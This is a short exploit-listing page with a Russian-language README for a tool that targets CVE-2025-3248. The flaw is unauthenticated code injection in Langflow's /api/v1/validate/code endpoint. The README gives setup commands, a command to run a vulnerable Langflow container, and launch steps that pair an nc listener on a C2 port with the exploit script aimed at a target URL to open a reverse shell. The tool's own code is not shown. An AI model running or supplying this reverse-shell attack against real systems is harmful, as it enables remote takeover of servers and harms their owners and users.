Sploitus

Exploit for CVE-2025-3248

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WAND3RLUST-CVE-2025-3248
# CVE-2025-3248

## Π’Π²Π΅Π΄Π΅Π½ΠΈΠ΅

ВСрсии Langflow Π΄ΠΎ 1.3.0 ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΉ ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΠΈ ΠΊΠΎΠ΄Π° Π² ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎΠΉ Ρ‚ΠΎΡ‡ΠΊΠ΅ /api/v1/validate/code Ρ‡Π΅Ρ€Π΅Π· Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡŽ Python exec(). Π”Π°Π½Π½Ρ‹ΠΉ эксплойт устанавливаСт ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΠ΅ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅ (reverse shell), ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ эту ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ.

## ИспользованиС

### ΠšΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡ

root@kitploit:~
    
    
    git clone https://github.com/wand3rlust/CVE-2025-3248.git
    cd CVE-2025-3248/
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    

### УязвимоС ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅

root@kitploit:~
    
    
    docker pull langflowai/langflow:1.1.4
    docker run -p 7860:7860 langflowai/langflow:1.1.4
    

### Запуск

root@kitploit:~
    
    
    # Π’Π΅Ρ€ΠΌΠΈΠ½Π°Π» 1
    nc -nvlp <C2_PORT>
    
    # Π’Π΅Ρ€ΠΌΠΈΠ½Π°Π» 2
    python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>